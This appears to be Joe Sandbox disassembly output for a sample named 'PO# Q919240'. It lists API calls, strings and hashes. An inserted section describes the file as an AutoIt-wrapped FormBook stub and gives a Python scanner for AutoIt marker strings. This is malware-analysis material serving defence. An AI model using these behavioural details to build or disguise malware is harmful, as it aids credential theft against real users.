                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                • String ID:
                • API String ID: 1582027408-0
                APIs
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CloseConnectCreateRegistry
                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                • API String ID: 3217815495-966354055
                APIs
                • GetCursorPos.USER32(?), ref: 004566AE
                • GetDesktopWindow.USER32 ref: 004566C3
                • GetWindowRect.USER32(00000000), ref: 004566CA
                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                • DestroyWindow.USER32(?), ref: 00456746
                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                • IsWindowVisible.USER32(?), ref: 0045682C
                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                • GetWindowRect.USER32(?,?), ref: 00456873
                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                • CopyRect.USER32(?,?), ref: 004568BE
                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                • String ID: ($,$tooltips_class32
                • API String ID: 225202481-3320066284
                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                APIs
                • OpenClipboard.USER32(?), ref: 0046DCE7
                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                • CloseClipboard.USER32 ref: 0046DD0D
                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                • CloseClipboard.USER32 ref: 0046DD41
                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                • CloseClipboard.USER32 ref: 0046DD99
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                • String ID:
                • API String ID: 15083398-0
                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • GetWindowRect.USER32(?,?), ref: 00471CF7
                • GetClientRect.USER32(?,?), ref: 00471D05
                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                • GetClientRect.USER32(?,?), ref: 00471E8A
                • GetStockObject.GDI32(00000011), ref: 00471EA6
                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                • String ID: @$AutoIt v3 GUI
                • API String ID: 867697134-3359773793
                • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                • API String ID: 1503153545-1459072770
                • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicoll$__wcsnicmp
                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                • API String ID: 790654849-32604322
                • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                APIs
                  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                • _fseek.LIBCMT ref: 00452B3B
                • __wsplitpath.LIBCMT ref: 00452B9B
                • _wcscpy.LIBCMT ref: 00452BB0
                • _wcscat.LIBCMT ref: 00452BC5
                • __wsplitpath.LIBCMT ref: 00452BEF
                • _wcscat.LIBCMT ref: 00452C07
                • _wcscat.LIBCMT ref: 00452C1C
                • __fread_nolock.LIBCMT ref: 00452C53
                • __fread_nolock.LIBCMT ref: 00452C64
                • __fread_nolock.LIBCMT ref: 00452C83
                • __fread_nolock.LIBCMT ref: 00452C94
                • __fread_nolock.LIBCMT ref: 00452CB5
                • __fread_nolock.LIBCMT ref: 00452CC6
                • __fread_nolock.LIBCMT ref: 00452CD7
                • __fread_nolock.LIBCMT ref: 00452CE8
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                • __fread_nolock.LIBCMT ref: 00452D78
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                • String ID:
                • API String ID: 2054058615-0
                • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window
                • String ID: 0
                • API String ID: 2353593579-4108050209
                • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                APIs
                • GetSysColor.USER32(0000000F), ref: 0044A05E
                • GetClientRect.USER32(?,?), ref: 0044A0D1
                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                • GetWindowDC.USER32(?), ref: 0044A0F6
                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                • ReleaseDC.USER32(?,?), ref: 0044A11B
                • GetSysColor.USER32(0000000F), ref: 0044A131
                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                • GetSysColor.USER32(0000000F), ref: 0044A14F
                • GetSysColor.USER32(00000005), ref: 0044A15B
                • GetWindowDC.USER32(?), ref: 0044A1BE
                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                • GetSysColor.USER32(00000008), ref: 0044A265
                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                • GetStockObject.GDI32(00000005), ref: 0044A28A
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                • String ID:
                • API String ID: 1744303182-0
                • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                • __mtterm.LIBCMT ref: 00417C34
                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                • __init_pointers.LIBCMT ref: 00417CE6
                • __calloc_crt.LIBCMT ref: 00417D54
                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                • API String ID: 4163708885-3819984048
                • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID: >>>AUTOIT SCRIPT<<<$\
                • API String ID: 0-1896584978
                • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
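                The `>>>AUTOIT SCRIPT<<<` string referenced by the function above, together with the `AutoIt v3 GUI` window class passed to `CreateWindowExW` earlier in this listing, is the classic static tell that the submitted file is an AutoIt-compiled stub wrapping the FormBook payload rather than a native FormBook binary. The scanner below is an added example for this report, not part of Joe Sandbox's output or of AutoIt itself: it searches a byte buffer for those two strings in both ASCII and UTF-16LE (the stub uses wide-string CRT routines and `W` APIs, so the UTF-16LE form is the one expected in the image) and reports every hit with its offset, so a reviewer can tell whether a string sits in the stub's own code and data or in an appended payload region. The sample buffer it scans by default is constructed inline and is not the real sample.

```python
"""Static triage: flag AutoIt-compiled executables by the marker strings a
Joe Sandbox run surfaced in the stub's own code. Added example; not part of
the report, of Joe Sandbox, or of AutoIt."""

from typing import List, Tuple

# Strings observed in the disassembly summaries of this report.
AUTOIT_MARKERS = (
    ">>>AUTOIT SCRIPT<<<",   # compiled-script marker referenced by the stub
    "AutoIt v3 GUI",         # window class handed to CreateWindowExW
)


def _encodings(marker: str) -> List[Tuple[str, bytes]]:
    """Byte patterns to search for: narrow (ASCII) and wide (UTF-16LE)."""
    return [("ascii", marker.encode("ascii")),
            ("utf-16le", marker.encode("utf-16-le"))]


def find_autoit_markers(data: bytes) -> List[Tuple[str, str, int]]:
    """Return every (marker, encoding, offset) hit in data, sorted by offset.

    All occurrences are reported, not just the first, because the same
    string can appear once in the stub and again inside an embedded payload.
    """
    hits: List[Tuple[str, str, int]] = []
    for marker in AUTOIT_MARKERS:
        for enc, pattern in _encodings(marker):
            start = 0
            while True:
                idx = data.find(pattern, start)
                if idx < 0:
                    break
                hits.append((marker, enc, idx))
                start = idx + 1
    return sorted(hits, key=lambda h: h[2])


def looks_like_autoit(data: bytes) -> bool:
    """True when the compiled-script marker is present in either encoding."""
    return any(m == ">>>AUTOIT SCRIPT<<<" for m, _, _ in find_autoit_markers(data))


def build_sample_buffer() -> bytes:
    """Constructed stand-in for a PE image: filler around wide-string markers.

    This is NOT the analysed sample; it only exercises the scanner offline.
    """
    filler = b"\x00" * 64
    return (b"MZ" + filler
            + "AutoIt v3 GUI".encode("utf-16-le") + filler
            + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le") + filler)


if __name__ == "__main__":
    import sys
    # Pass a file path to scan a real binary; otherwise scan the constructed buffer.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_buffer()
    for marker, enc, off in find_autoit_markers(blob):
        print(f"{off:#010x}  {enc:<8}  {marker}")
    print("AutoIt-compiled:", looks_like_autoit(blob))
```

Run it against the dropped file or the `0x400000` memory dump listed under Memory Dump Source to confirm the markers, then unpack the embedded script with a dedicated AutoIt extractor; the marker check only establishes the wrapper, it does not recover the FormBook payload.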
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicoll$IconLoad
                • String ID: blank$info$question$stop$warning
                • API String ID: 2485277191-404129466
                • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                APIs
                • LoadIconW.USER32(?,00000063), ref: 0045464C
                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                • SetWindowTextW.USER32(?,?), ref: 00454678
                • GetDlgItem.USER32(?,000003EA), ref: 00454690
                • SetWindowTextW.USER32(00000000,?), ref: 00454697
                • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                • GetWindowRect.USER32(?,?), ref: 004546F5
                • SetWindowTextW.USER32(?,?), ref: 00454765
                • GetDesktopWindow.USER32 ref: 0045476F
                • GetWindowRect.USER32(00000000), ref: 00454776
                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                • GetClientRect.USER32(?,?), ref: 004547D2
